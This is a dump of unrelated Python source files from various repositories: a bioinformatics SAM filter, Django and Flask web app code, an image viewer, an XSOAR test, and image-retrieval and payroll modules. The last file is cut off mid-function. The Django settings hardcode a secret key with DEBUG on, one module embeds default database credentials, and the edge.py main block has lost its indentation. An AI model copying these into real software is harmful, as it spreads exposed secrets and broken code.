[Dataset table header — each row below is one source file, with columns: blob_id, directory_id, path, content_id, detected_licenses, license_type, repo_name, snapshot_id, revision_id, branch_name, visit_date, revision_date, committer_date, github_id, star_events_count, fork_events_count, gha_license_id, gha_event_created_at, gha_created_at, gha_language, src_encoding, language, is_vendor, is_generated, length_bytes, extension, content, authors, author]
# ===== /scripts/filterSAMV3.py (repo: jxmavs/MPRAu, branch: main, license: none, UTF-8, Python, 2,399 bytes) =====
## 06/14/16
##
## Dustin Griesemer
##
## filterSAM.py -inputF SAM_input_path -passF pass_reads_path -failF fail_reads_path -infoF seq_info_path -s stats_output_path
## Example: python /home/unix/dusting/src/MPRA/seq/filterSAM.py -inputF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md.sam -passF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md_filtered.sam -failF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md_failed.sam
##
## Filter SAM file for read homology
##
import sys
import argparse
import re
parser = argparse.ArgumentParser()
parser.add_argument('-inputF')
parser.add_argument('-passF')
parser.add_argument('-failF')
parser.add_argument('-infoF')
parser.add_argument('-s')
parsed = parser.parse_args()
input_file = open(parsed.inputF, 'r')
info_file = open(parsed.infoF, 'r')
pass_file = open(parsed.passF, 'w')
fail_file = open(parsed.failF, 'w')

# Map each reference sequence ID to its length (column 5 of the info file).
length = {}
for line in info_file:
    if line[0] == '#':
        continue
    vals = line.strip().split('\t')
    seqID = vals[0]
    seq_length = vals[4]
    length[seqID] = int(seq_length)

num_pass_homology_filter = 0
num_fail_homology_filter = 0
for line in input_file:
    if line[0] == '@':
        # SAM header lines are copied to both outputs.
        pass_file.write(line)
        fail_file.write(line)
        continue
    vals = line.strip().split('\t')
    seqID = vals[2]
    seq_length = length[seqID]
    MD_tag = vals[12].split(':')[-1]
    MD_vals = re.findall('[0-9]+|\^[A-Z]+|[A-Z]+', MD_tag)
    match_count = 0
    mismatch_count = 0
    for entry in MD_vals:
        if entry == '':
            continue
        try:
            match_count = match_count + int(entry)
        except ValueError:
            if entry[0] == '^':  # deletions are reported as ^<bases>
                entry = entry[1:]
            mismatch_count = mismatch_count + len(entry)
    MD_length = match_count + mismatch_count
    MD_max = min(seq_length, 123)  # only 123bp can be read at most
    if MD_length > MD_max:
        percent_match = (float(MD_max) - float(mismatch_count)) / float(MD_max)
    else:
        percent_match = float(match_count) / float(MD_max)
    if percent_match > 0.95:
        num_pass_homology_filter += 1
        pass_file.write(line)
    else:
        num_fail_homology_filter += 1
        fail_file.write(line)

with open(parsed.s, "w") as out_stats_file:
    out_stats_file.write("Num_Pass_Filter\tNum_Fail_Filter\n")
    out_stats_file.write("{0}\t{1}\n".format(num_pass_homology_filter, num_fail_homology_filter))

input_file.close()
info_file.close()
pass_file.close()
fail_file.close()
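# Worked example (illustrative values, not from the original data): for an MD
# tag of "10A5^AC6", the re.findall pattern above yields
# ['10', 'A', '5', '^AC', '6'], so match_count = 10 + 5 + 6 = 21 and
# mismatch_count = 1 + 2 = 3, giving MD_length = 24.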
# ===== /jobs/views.py (repo: fyangtx/portfolio-project, license: none, UTF-8, Python, 299 bytes) =====
from django.shortcuts import render
from .models import Job


# Create your views here.
def home(request):
    jobs = Job.objects
    return render(request, 'jobs/home.html', {'jobs': jobs})


def Blog(request):
    jobs = Job.objects
    return render(request, 'blog/allblogs.html', {'blog': jobs})
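# Note: Job.objects is a Manager rather than a QuerySet, so the templates
# presumably iterate over jobs.all; passing Job.objects.all() explicitly
# would make the view's intent clearer.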
"[email protected]"
] | |
# ===== /img_veiwer.py (repo: Aleks4920/Image-Veiwer, branch: main, license: none, UTF-8, Python, 1,503 bytes) =====
import PySimpleGUI as sg
import os.path

# Left column: folder picker plus a list of image files found in that folder.
file_list_column = [
    [
        sg.Text("Image Folder"),
        sg.In(size=(25, 1), enable_events=True, key="-FOLDER-"),
        sg.FolderBrowse(),
    ],
    [
        sg.Listbox(
            values=[], enable_events=True, size=(40, 20), key="-FILE LIST-"
        )
    ],
]

# Right column: the currently selected filename and the image itself.
image_veiwer_column = [
    [sg.Text("choose and Image")],
    [sg.Text(size=(40, 10), key="-TOUT-")],
    [sg.Image(key="-IMAGE-")],
]

layout = [
    [
        sg.Column(file_list_column),
        sg.VSeperator(),
        sg.Column(image_veiwer_column),
    ]
]

window = sg.Window("Image Veiwer", layout)

while True:
    event, values = window.read()
    if event == "Exit" or event == sg.WIN_CLOSED:
        break
    if event == "-FOLDER-":
        folder = values["-FOLDER-"]
        try:
            file_list = os.listdir(folder)
        except OSError:
            file_list = []
        # tkinter's PhotoImage (used by sg.Image) natively renders PNG and GIF.
        fnames = [
            f
            for f in file_list
            if os.path.isfile(os.path.join(folder, f))
            and f.lower().endswith((".png", ".gif"))
        ]
        window["-FILE LIST-"].update(fnames)
    elif event == "-FILE LIST-":
        try:
            filename = os.path.join(values["-FOLDER-"], values["-FILE LIST-"][0])
            window["-TOUT-"].update(filename)
            window["-IMAGE-"].update(filename=filename)
            print(window["-IMAGE-"].get_size())
        except Exception:
            # No selection yet, or the file could not be loaded.
            pass

window.close()
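# To try it: `pip install PySimpleGUI`, run `python img_veiwer.py`, then browse
# to a folder containing .png or .gif files.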
# ===== /Packs/Campaign/Scripts/GetCampaignIncidentsInfo/GetCampainIncidentsInfo_test.py (repo: adambaumeister/content, license: MIT, UTF-8, Python, 5,072 bytes) =====
from CommonServerPython import *
from GetCampaignIncidentsInfo import *

REQUIRED_KEYS = ['id', 'name', 'emailfrom', 'recipients', 'severity', 'status', 'created']
STR_VAL_KEYS = ['name', 'emailfrom', 'recipients', 'created']
NUM_OF_INCIDENTS = 5
MOCKED_INCIDENTS = [
    {key.replace('_', ''): f'test_{key}_{i}' if key in STR_VAL_KEYS else i for key in REQUIRED_KEYS}
    for i in range(NUM_OF_INCIDENTS)
]
UPDATED_MOCKED_INCIDENTS = [
    {key.replace('_', ''): 3 if key in KEYS_FETCHED_BY_QUERY else i for key in REQUIRED_KEYS}
    for i in range(NUM_OF_INCIDENTS)
]
SOME_ERROR = 'Raised by mock of demisto.context'


def raise_exception():
    raise Exception(SOME_ERROR)
def test_incidents_info_md_happy_path(mocker):
    """
    Given:
        - Mocked incidents
    When:
        - Get the campaign incidents info
    Then:
        - Validate all required keys and values are in the MD result
    """
    # prepare
    mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys')
    mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=MOCKED_INCIDENTS)
    mocker.patch.object(demisto, 'results')
    mocker.patch.object(demisto, 'incidents', return_value=MOCKED_INCIDENTS)
    mocker.patch.object(demisto, 'executeCommand')
    mocker.patch.object(demisto, 'context', return_value={'EmailCampaign': {'fieldsToDisplay': REQUIRED_KEYS}})

    # run
    main()
    hr = demisto.results.call_args[0][0]['HumanReadable']

    # validate required keys are headers in the MD and the expected values are in the table
    assert all(string_to_table_header(key) in hr for key in REQUIRED_KEYS)
    assert all(f'test_{key}_' in hr for key in STR_VAL_KEYS)
    assert all(status in hr for status in STATUS_DICT.values())
    assert all(f'[{i}](#/Details/{i})' in hr for i in range(NUM_OF_INCIDENTS))  # linkable incident id

    # validate the call to update empty fields
    args = demisto.executeCommand.call_args[0][1]
    assert args['customFields'] == DEFAULT_CUSTOM_FIELDS


def test_incidents_info_md_for_empty_context(mocker):
    """
    Given:
        - There are no campaign incidents in the context
    When:
        - Get the campaign incidents info
    Then:
        - Validate the return message
    """
    # prepare
    mocker.patch.object(demisto, 'results')
    mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=[])

    # run
    main()

    # validate
    assert demisto.results.call_args[0][0]['HumanReadable'] == NO_CAMPAIGN_INCIDENTS_MSG


def test_incidents_info_md_with_invalid_keys(mocker):
    """
    Given:
        - Incidents in the campaign context contain some invalid keys (e.g. status)
    When:
        - Get value from incident (GetCampaignIncidentsInfo.get_incident_val)
    Then:
        - Validate the invalid key is not in the human readable
    """
    # prepare
    incident_with_invalid_status = MOCKED_INCIDENTS[4]
    incident_without_status = MOCKED_INCIDENTS[0].copy()
    incident_without_status.pop('status')
    incidents = [incident_with_invalid_status, incident_without_status]
    mocker.patch.object(demisto, 'results')
    mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=incidents)
    mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys', return_value=incidents)

    # run
    main()
    hr = demisto.results.call_args[0][0]['HumanReadable']

    # validate
    assert 'Status' not in hr
    assert all(status not in hr for status in STATUS_DICT.values())


def test_some_error(mocker):
    """
    Given:
        - Dynamic section tries to populate the MD from the script
    When:
        - Get incident info
    Then:
        - Raise an exception and validate that return_error is called
    """
    mocker.patch.object(demisto, 'results')
    mocker.patch.object(demisto, 'context', side_effect=raise_exception)
    mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys')

    # run
    try:
        main()
        assert False, 'SystemExit should have occurred'
    except SystemExit:
        assert demisto.results.call_args[0][0]['Contents'] == SOME_ERROR


def test_updated_status_and_severity(mocker):
    """
    Given -
        Status or severity of incidents in the campaign was changed
    When -
        Get the incidents info
    Then -
        Validate the updated values are returned
    """
    # prepare
    mocker.patch.object(demisto, 'results')
    mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=MOCKED_INCIDENTS)
    mocker.patch.object(demisto,
                        'executeCommand',
                        return_value=[{'Contents': json.dumps(UPDATED_MOCKED_INCIDENTS), 'Type': 'str'}])

    # run
    main()

    # validate
    hr = demisto.results.call_args[0][0]['HumanReadable']
    assert hr.count('| Archive |') == NUM_OF_INCIDENTS  # all incidents should have the 'Archive' status
    assert hr.count('| 3 |') == NUM_OF_INCIDENTS  # all incidents should have severity 3
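# Assuming the usual XSOAR content dev setup (pytest and pytest-mock installed,
# CommonServerPython on the path), the suite runs with:
#   pytest GetCampainIncidentsInfo_test.py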
# ===== /src/edge.py (repo: YulongLee/2020DIGIX-AI--competition, license: none, UTF-8, Python, 5,790 bytes) =====
# -*- coding: utf-8 -*-
from __future__ import print_function
from src.evaluate import evaluate_class
from src.DB import Database
from six.moves import cPickle
import numpy as np
import scipy.misc
from math import sqrt
import os
stride = (1, 1)
n_slice = 10
h_type = 'region'
d_type = 'cosine'
depth = 5
''' MMAP
depth
depthNone, region-stride(1, 1)-n_slice10,co, MMAP 0.101670982288
depth100, region-stride(1, 1)-n_slice10,co, MMAP 0.207817305128
depth30, region-stride(1, 1)-n_slice10,co, MMAP 0.291715090839
depth10, region-stride(1, 1)-n_slice10,co, MMAP 0.353722379063
depth5, region-stride(1, 1)-n_slice10,co, MMAP 0.367119444444
depth3, region-stride(1, 1)-n_slice10,co, MMAP 0.3585
depth1, region-stride(1, 1)-n_slice10,co, MMAP 0.302
(exps below use depth=None)
d_type
global-stride(2, 2),d1, MMAP 0.0530993236031
global-stride(2, 2),co, MMAP 0.0528310744618
stride
region-stride(2, 2)-n_slice4,d1, MMAP 0.0736245142237
region-stride(1, 1)-n_slice4,d1, MMAP 0.0704206226545
n_slice
region-stride(1, 1)-n_slice10,co, MMAP 0.101670982288
region-stride(1, 1)-n_slice6,co, MMAP 0.0977736743859
h_type
global-stride(2, 2),d1, MMAP 0.0530993236031
region-stride(2, 2)-n_slice4,d1, MMAP 0.0736245142237
'''
edge_kernels = np.array([
    [
        # vertical
        [1, -1],
        [1, -1]
    ],
    [
        # horizontal
        [1, 1],
        [-1, -1]
    ],
    [
        # 45 diagonal
        [sqrt(2), 0],
        [0, -sqrt(2)]
    ],
    [
        # 135 diagonal
        [0, sqrt(2)],
        [-sqrt(2), 0]
    ],
    [
        # non-directional
        [2, -2],
        [-2, 2]
    ]
])
# cache dir
cache_dir = 'cache'
if not os.path.exists(cache_dir):
    os.makedirs(cache_dir)
class Edge(object):

    def histogram(self, input, stride=(2, 2), type=h_type, n_slice=n_slice, normalize=True):
        ''' count img histogram

        arguments
            input    : a path to an image or a numpy.ndarray
            stride   : stride of edge kernel
            type     : 'global' means count the histogram for the whole image
                       'region' means count the histogram for regions in images, then concatenate all of them
            n_slice  : works when type equals 'region'; height & width will be equally sliced into N slices
            normalize: normalize output histogram

        return
            type == 'global'
                a numpy array with size len(edge_kernels)
            type == 'region'
                a numpy array with size len(edge_kernels) * n_slice * n_slice
        '''
        if isinstance(input, np.ndarray):  # examine input type
            img = input.copy()
        else:
            img = scipy.misc.imread(input, mode='RGB')
        height, width, channel = img.shape

        if type == 'global':
            hist = self._conv(img, stride=stride, kernels=edge_kernels)

        elif type == 'region':
            hist = np.zeros((n_slice, n_slice, edge_kernels.shape[0]))
            h_silce = np.around(np.linspace(0, height, n_slice+1, endpoint=True)).astype(int)
            w_slice = np.around(np.linspace(0, width, n_slice+1, endpoint=True)).astype(int)
            for hs in range(len(h_silce)-1):
                for ws in range(len(w_slice)-1):
                    img_r = img[h_silce[hs]:h_silce[hs+1], w_slice[ws]:w_slice[ws+1]]  # slice img to regions
                    hist[hs][ws] = self._conv(img_r, stride=stride, kernels=edge_kernels)

        if normalize:
            hist /= np.sum(hist)

        return hist.flatten()
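    # Note: scipy.misc.imread was removed in SciPy 1.2, so on a recent SciPy this
    # would need imageio.imread (or similar) instead. With the module defaults
    # above (region mode, n_slice=10, 5 kernels) the flattened histogram has
    # 10 * 10 * 5 = 500 bins.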
    def _conv(self, img, stride, kernels, normalize=True):
        H, W, C = img.shape
        conv_kernels = np.expand_dims(kernels, axis=3)
        conv_kernels = np.tile(conv_kernels, (1, 1, 1, C))
        assert list(conv_kernels.shape) == list(kernels.shape) + [C]  # check kernels size

        sh, sw = stride
        kn, kh, kw, kc = conv_kernels.shape

        hh = int((H - kh) / sh + 1)
        ww = int((W - kw) / sw + 1)

        hist = np.zeros(kn)

        for idx, k in enumerate(conv_kernels):
            for h in range(hh):
                hs = int(h*sh)
                he = int(h*sh + kh)
                for w in range(ww):
                    ws = w*sw
                    we = w*sw + kw
                    hist[idx] += np.sum(img[hs:he, ws:we] * k)  # element-wise product

        if normalize:
            hist /= np.sum(hist)

        return hist
    def make_samples(self, db, verbose=True):
        if h_type == 'global':
            sample_cache = "edge-{}-stride{}".format(h_type, stride)
        elif h_type == 'region':
            sample_cache = "edge-{}-stride{}-n_slice{}".format(h_type, stride, n_slice)

        try:
            samples = cPickle.load(open(os.path.join(cache_dir, sample_cache), "rb", True))
            for sample in samples:
                sample['hist'] /= np.sum(sample['hist'])  # normalize
            if verbose:
                print("Using cache..., config=%s, distance=%s, depth=%s" % (sample_cache, d_type, depth))
        except Exception:
            if verbose:
                print("Counting histogram..., config=%s, distance=%s, depth=%s" % (sample_cache, d_type, depth))
            samples = []
            data = db.get_data()
            for d in data.itertuples():
                d_img, d_cls = getattr(d, "img"), getattr(d, "cls")
                d_hist = self.histogram(d_img, type=h_type, n_slice=n_slice)
                samples.append({
                    'img': d_img,
                    'cls': d_cls,
                    'hist': d_hist
                })
            cPickle.dump(samples, open(os.path.join(cache_dir, sample_cache), "wb", True))

        return samples
if __name__ == "__main__":
db = Database()
# check shape
assert edge_kernels.shape == (5, 2, 2)
# evaluate database
APs = evaluate_class(db, f_class=Edge, d_type=d_type, depth=depth)
cls_MAPs = []
for cls, cls_APs in APs.items():
MAP = np.mean(cls_APs)
print("Class {}, MAP {}".format(cls, MAP))
cls_MAPs.append(MAP)
print("MMAP", np.mean(cls_MAPs))
# ===== /ispyb/__init__.py (repo: drnasmith/flask-ispyb-admin, license: Apache-2.0, UTF-8, Python, 958 bytes) =====
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.engine.url import URL

db = SQLAlchemy()
Base = db.Model

# Use config module if provided:
# db_config = {
#     'user'     : 'dbuser',
#     'password' : 'dbpassword',
#     'host'     : 'localhost',
#     'port'     : '3306',
#     'name'     : 'test_db',
# }
try:
    from config import db_config

    db_url = URL(drivername='mysql+mysqlconnector',
                 username=db_config.get('user'),
                 password=db_config.get('password'),
                 host=db_config.get('host'),
                 port=db_config.get('port'),
                 database=db_config.get('name'))
except ImportError:
    db_url = 'mysql+mysqlconnector://ispyb:[email protected]:3306/ispyb'


def init_app(app):
    """
    Initialise the database connection and flask-sqlalchemy
    """
    print("Using database connection URL: {}".format(db_url))
    app.config['SQLALCHEMY_DATABASE_URI'] = db_url
    db.init_app(app)
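# Minimal usage sketch (illustrative, assuming this package is importable as `ispyb`):
#   from flask import Flask
#   import ispyb
#   app = Flask(__name__)
#   ispyb.init_app(app)   # binds flask-sqlalchemy's `db` to the app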
# ===== /mysite/settings.py (repo: cdelfierro/my-first-blog, license: none, UTF-8, Python, 3,241 bytes) =====
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4@-s**^@6tx7i83wpt*)ygw1kv&25$c5==h(ap15mxp7ivg(&!'
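# A common hardening step (not part of this tutorial project) is to load the
# key from the environment instead, e.g.:
#   SECRET_KEY = os.environ['DJANGO_SECRET_KEY']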
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Santiago'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
LOGIN_REDIRECT_URL = '/'
# ===== /src/feature_engineer/user_action_app_sum.py (repo: zgcgreat/2017-cvr-tencent, license: none, UTF-8, Python, 3,620 bytes) =====
'''
The number of apps a user installed before the current day, computed both
without and with the install counts from the first 16 days.
'''
import collections
from csv import DictReader

# Number of apps each user had installed in the first 16 days (precomputed).
user_app_install_sum = {}
for row in DictReader(open('../../output/feature_data/installed_app_cnt.csv', 'r')):
    user_app_install_sum[row['userID']] = row['installed_app_cnt']

# For each day 24-31, count the apps each user installed on earlier days.
user_app_sum = {}
for cur_date in range(24, 32):
    user_app_sum[str(cur_date)] = collections.defaultdict(lambda: 0)
    for row in DictReader(open('../../data_ori/user_app_actions.csv', 'r')):
        date = int(row['installTime'][:2])
        if date < cur_date:
            user_app_sum[str(cur_date)][row['userID']] += 1
    print(cur_date)
print(user_app_sum['24'])
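# At this point user_app_sum['24'][uid] is the number of rows in
# user_app_actions.csv whose install day is before day 24 for that user;
# the prints above are just progress/sanity checks.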
print('train set...')
with open('../../output/feature_data/tr_user_app_sum.csv', 'w') as fo:
    fo.write('label,clickTime,userID,user_app_action_sum,user_app_action_installed_sum\n')
    for row in DictReader(open('../../data/train.csv', 'r')):
        date = int(row['date'])
        userID = row['userID']
        # app_action_count = 0            # apps installed from day 17 up to the day before the current day
        # app_action_installed_count = 0  # first-16-days installs + installs from day 17 up to the day before
        if 28 <= date <= 29:
            if userID in user_app_sum[str(date)].keys():
                app_action_count = user_app_sum[str(date)][userID]  # apps installed from day 17 up to the day before
            else:
                app_action_count = 0
            if userID in user_app_install_sum.keys():
                app_installed_count = int(user_app_install_sum[userID])  # apps installed in the first 16 days
            else:
                app_installed_count = 0
            app_action_installed_count = app_action_count + app_installed_count  # first-16-days installs + later installs
            if app_action_count == 0:
                app_action_count = -1
            if app_installed_count == 0:
                app_installed_count = -1
            if app_action_installed_count == 0:
                app_action_installed_count = -1
            fo.write(row['label'] + ',' + row['date'] + ',' + userID + ',' + str(app_action_count) + ',' +
                     str(app_action_installed_count) + '\n')

print('test set...')
with open('../../output/feature_data/te_user_app_sum.csv', 'w') as fo:
    fo.write('label,clickTime,userID,user_app_action_sum,user_app_action_installed_sum\n')
    for row in DictReader(open('../../data/test.csv', 'r')):
        date = int(row['date'])
        userID = row['userID']
        app_action_count = 0
        app_action_installed_count = 0
        if date == 31:
            if userID in user_app_sum[str(date)].keys():
                app_action_count = user_app_sum[str(date)][userID]
            else:
                app_action_count = 0
            if userID in user_app_install_sum.keys():
                app_installed_count = int(user_app_install_sum[userID])
            else:
                app_installed_count = 0
            app_action_installed_count = app_action_count + app_installed_count
            if app_action_count == 0:
                app_action_count = -1
            if app_installed_count == 0:
                app_installed_count = -1
            if app_action_installed_count == 0:
                app_action_installed_count = -1
            fo.write(row['label'] + ',' + row['date'] + ',' + userID + ',' + str(app_action_count) + ',' +
                     str(app_action_installed_count) + '\n')
# ===== /app/transaction/salary_sheet.py (repo: vaibhavantil/Hafta, license: MIT, UTF-8, Python, 16,430 bytes) =====
# Salary Sheet
from flask import Blueprint
from flask import render_template, redirect, url_for, request, session, jsonify
from flask_login import login_user, logout_user, current_user
from app.transaction import bp
from app.employee.model import Employee, EmployeeAdvanceSchema
from app.master.model import Company, AttendenceRules
from app.transaction.model_att import Attendence, AttendenceSchema
from app.transaction.model_adv import Advance, AdvanceSchema
from app.transaction.model_sal import SalarySheet, SalarySheetSlips
from app import db, ma
from datetime import datetime
import requests
import json


@bp.route('/salary_sheet/', methods=['GET'])
def show_sheet():
    return render_template('transaction/salary_sheet.html')


@bp.route('/salary_sheet/print/all', methods=['GET', 'POST'])
def print_salatry_sheet_company():
    return render_template('reports/print_sheet.html')


@bp.route('/salary_sheet/delete/<id>', methods=['GET', 'POST'])
def delete_salatry_sheet_company(id):
    data = SalarySheet.query.filter_by(id=int(id))
    try:
        data.delete()
        db.session.commit()
        return jsonify({'success': 'Deleted'})
    except Exception as e:
        return jsonify({'message': 'Something went wrong' + str(e)})


@bp.route('/salary_sheet/print/selected', methods=['GET', 'POST'])
def print_salatry_sheet_selected():
    return render_template('reports/print_sheet_selected.html')
@bp.route('/salary_sheet/slips', methods=['POST'])
def salary_slips_emp():
    # Needs None checks
    payload = request.json
    if payload is not None:
        payload_date = payload['date'].split('-')
        payload_date = datetime(
            int(payload_date[0]), int(payload_date[1]), int(1))
        emp_id = payload['emp_id']
        json_schema = AttendenceSchema()
        emp_att = Attendence.query.filter(Attendence.employee.any(
            Employee.id == int(emp_id)), Attendence.date == payload_date).first()
        slips = SalarySheetSlips.query.filter(SalarySheetSlips.employee.any(
            Employee.id == int(emp_id)), SalarySheetSlips.date == payload_date).first()
        if slips is not None and emp_att is not None:
            json_data = json.loads(json_schema.dumps(emp_att))
            att_rules = AttendenceRules.query.first()
            late_comin_ratio = float(
                att_rules.late_comin_day / att_rules.late_comin)
            early_going_ratio = float(
                att_rules.early_going_day / att_rules.early_going)
            json_data['net_adv_deduction'] = slips.adv_deduction
            json_data['days_payable_late'] = late_comin_ratio * \
                json_data['latecomin']
            json_data['days_payable_early'] = early_going_ratio * \
                json_data['earlygoing']
            json_data['days_payable'] = round(
                json_data['daysatt'] - (json_data['days_payable_late'] + json_data['days_payable_early']), 2)
            json_data['pay_1'] = float(
                json_data['days_payable']) * (float(json_data['employee'][0]['basicpay']) / 30)
            if json_data['esi'] is None:
                json_data['esi'] = 0
            if json_data['tds'] is None:
                json_data['tds'] = 0
            if json_data['pf'] is None:
                json_data['pf'] = 0
            if json_data['other_deduction'] is None:
                json_data['other_deduction'] = 0
            json_data['total_deductions'] = float(json_data['esi']) + float(json_data['pf']) + float(
                json_data['tds']) + float(json_data['other_deduction']) + float(json_data['net_adv_deduction'])
            json_data['net_payable'] = float(
                json_data['pay_1'] - json_data['total_deductions'])
            return jsonify({'success': json_data})
        else:
            return jsonify({'message': 'Data not present'})
    else:
        return jsonify({'message': 'Empty data received.'})
@bp.route('/salary_sheet/slips/range', methods=['POST'])
def salary_slips_emp_range():
    # Needs None checks
    payload = request.json
    if payload is not None:
        payload_start_date = payload['start_date'].split('-')
        payload_start_date = datetime(
            int(payload_start_date[0]), int(payload_start_date[1]), int(1))
        payload_end_date = payload['end_date'].split('-')
        payload_end_date = datetime(
            int(payload_end_date[0]), int(payload_end_date[1]), int(1))
        emp_id = payload['emp_id']
        json_schema = AttendenceSchema()
        emp_att = Attendence.query.filter(Attendence.employee.any(
            Employee.id == int(emp_id)), Attendence.date >= payload_start_date, Attendence.date <= payload_end_date).all()
        slips = SalarySheetSlips.query.filter(SalarySheetSlips.employee.any(
            Employee.id == int(emp_id)), SalarySheetSlips.date >= payload_start_date, SalarySheetSlips.date <= payload_end_date).all()
        print(slips)
        att_rules = AttendenceRules.query.first()
        late_comin_ratio = float(
            att_rules.late_comin_day / att_rules.late_comin)
        early_going_ratio = float(
            att_rules.early_going_day / att_rules.early_going)
        all_data = []
        for slip, att in zip(slips, emp_att):
            json_data = json.loads(json_schema.dumps(att))
            json_data['net_adv_deduction'] = slip.adv_deduction
            json_data['days_payable_late'] = late_comin_ratio * \
                json_data['latecomin']
            json_data['days_payable_early'] = early_going_ratio * \
                json_data['earlygoing']
            json_data['days_payable'] = round(
                json_data['daysatt'] - (json_data['days_payable_late'] + json_data['days_payable_early']), 2)
            json_data['pay_1'] = float(
                json_data['days_payable']) * (float(json_data['employee'][0]['basicpay']) / 30)
            if json_data['esi'] is None:
                json_data['esi'] = 0
            if json_data['tds'] is None:
                json_data['tds'] = 0
            if json_data['pf'] is None:
                json_data['pf'] = 0
            if json_data['other_deduction'] is None:
                json_data['other_deduction'] = 0
            json_data['total_deductions'] = float(json_data['esi']) + float(json_data['pf']) + float(
                json_data['tds']) + float(json_data['other_deduction']) + float(json_data['net_adv_deduction'])
            json_data['net_payable'] = float(
                json_data['pay_1'] - json_data['total_deductions'])
            print(json_data['net_payable'])
            all_data.append(json_data)
        return jsonify({'success': all_data})
    else:
        return jsonify({'message': 'Data not present'})
@bp.route('/salary_sheet/process', methods=['POST'])
def process_sheet():
    payload = request.json
    if payload is not None:
        json_data = payload['data']
        payload_company = Company.query.filter_by(
            id=int(payload['company'])).first()
        payload_date = payload['date'].split('-')
        payload_date = datetime(
            int(payload_date[0]), int(payload_date[1]), int(1))
        net_paid = float(0)
        net_advance_deduction = float(0)
        net_attendence = {}
        check_data = SalarySheet.query.filter(SalarySheet.company.any(Company.id == int(payload['company'])),
                                              SalarySheet.month == payload_date)
        if check_data.first() is None:
            salary = SalarySheet(
                payload_date, net_advance_deduction, net_paid, json.dumps(net_attendence))
            for item in json_data:
                # Debit advance
                try:
                    emp = Employee.query.filter_by(
                        id=int(item['employee'][0]['id'])).first()
                    slip_data = SalarySheetSlips(
                        item['net_adv_deduction'], payload_date)
                    slip_data.employee.append(emp)
                    pending_advance = float(
                        item['net_deduction_month']) + float(item['net_deduction_year'])
                    if pending_advance != float(0):
                        new_data = Advance(advanceamt=float(
                            item['net_adv_deduction']), trans="debit", date=payload_date, deduction_period="debit")
                        new_data.employee.append(emp)
                        new_data.employee.append(payload_company)
                        db.session.add(new_data)
                    slip_data.sheet.append(salary)
                    db.session.add(slip_data)
                    db.session.commit()
                    net_paid += float(item['net_payable'])
                    net_advance_deduction += float(item['net_adv_deduction'])
                    # Attendence Percentage later
                except Exception as e:
                    print(str(e))
                    return jsonify({'message': 'Something went wrong. -' + str(e)})
            try:
                salary.company.append(payload_company)
                db.session.add(salary)
                db.session.commit()
                return jsonify({'success': 'Payroll processed.'})
            except Exception as e:
                print(str(e))
                return jsonify({'message': 'Something went wrong. -' + str(e)})
        else:
            return jsonify({'message': 'Salary Sheet already processed for this month.'})
        # Save payroll info - paid out, advances paid out, deductions & attendence
    else:
        return jsonify({'message': 'Empty data received.'})
@bp.route('/salary_sheet/generate', methods=['POST'])
def salary_generate_sheet():
    if request.method == 'POST':
        if request.json is not None:
            try:
                payload = request.json
                company = payload['company']
                month = payload['month']
                return generate_sheet(company, month)
            except Exception as e:
